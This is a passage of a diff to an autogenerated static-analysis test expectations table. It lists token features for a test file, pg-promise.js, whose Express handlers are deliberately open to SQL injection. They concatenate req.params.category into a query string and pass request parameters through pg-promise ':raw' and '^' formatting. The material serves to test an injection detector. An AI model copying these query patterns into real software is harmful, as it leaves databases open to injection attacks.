name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db = pg ... RING']) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db = pg ... RING']) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:16 | pgp | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:16 | pgp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:16 | pgp | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:16 | pgp | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:16 | pgp | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | exceptional return of pgp(pro ... RING']) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | exceptional return of pgp(pro ... RING']) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | exceptional return of pgp(pro ... RING']) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | exceptional return of pgp(pro ... RING']) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | exceptional return of pgp(pro ... RING']) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | pgp(pro ... RING']) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | pgp(pro ... RING']) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | pgp(pro ... RING']) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | pgp(pro ... RING']) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:14:4:53 | pgp(pro ... RING']) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:24 | process | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:24 | process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:24 | process | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:24 | process | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:24 | process | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:28 | process.env | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:28 | process.env | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:28 | process.env | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:28 | process.env | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:28 | process.env | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:52 | process ... TRING'] | CalleeFlexibleAccessPath | pgp | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:52 | process ... TRING'] | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:52 | process ... TRING'] | calleeImports | pg-promise | @@ -3491,6 +17374,40 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:52 | process ... TRING'] | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:52 | process ... TRING'] | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:18:4:52 | process ... TRING'] | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:26:4:28 | env | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:26:4:28 | env | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:26:4:28 | env | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:26:4:28 | env | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:26:4:28 | env | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:30:4:51 | 'DB_CON ... STRING' | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:30:4:51 | 'DB_CON ... STRING' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:30:4:51 | 'DB_CON ... STRING' | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:30:4:51 | 'DB_CON ... STRING' | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:30:4:51 | 'DB_CON ... STRING' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:6:11 | query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:6:11 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:6:11 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:6:11 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:6:11 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:6:11 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:6:11 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:6:11 | query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query = ... PRICE" | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query = ... PRICE" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query = ... PRICE" | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query = ... PRICE" | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:7:7:55 | query = ... PRICE" | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:6:68 | "SELECT ... GORY='" | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:6:68 | "SELECT ... GORY='" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:6:68 | "SELECT ... GORY='" | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:6:68 | "SELECT ... GORY='" | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:6:68 | "SELECT ... GORY='" | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:6:68 | "SELECT ... GORY='" | stringConcatenatedWith | -endpoint- req.params.category + '' ORDER BY PRICE' | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:7:34 | "SELECT ... ategory | contextFunctionInterfaces | cnd(t) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:7:34 | "SELECT ... ategory | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:7:34 | "SELECT ... ategory | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | @@ -3501,6 +17418,63 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:7:55 | "SELECT ... PRICE" | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:7:55 | "SELECT ... PRICE" | enclosingFunctionName | get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:7:55 | "SELECT ... PRICE" | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:18 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:18 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:18 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:18 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:25 | req.params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:25 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:25 | req.params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:25 | req.params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:25 | req.params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:34 | req.params.category | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:34 | req.params.category | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:34 | req.params.category | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:34 | req.params.category | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:34 | req.params.category | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:16:7:34 | req.params.category | stringConcatenatedWith | 'SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='' -endpoint- '' ORDER BY PRICE' | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:20:7:25 | params | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:20:7:25 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:20:7:25 | params | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:20:7:25 | params | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:20:7:25 | params | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:27:7:34 | category | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:27:7:34 | category | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:27:7:34 | category | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:27:7:34 | category | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:27:7:34 | category | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:38:7:55 | "' ORDER BY PRICE" | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:38:7:55 | "' ORDER BY PRICE" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:38:7:55 | "' ORDER BY PRICE" | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:7:38:7:55 | "' ORDER BY PRICE" | enclosingFunctionName | 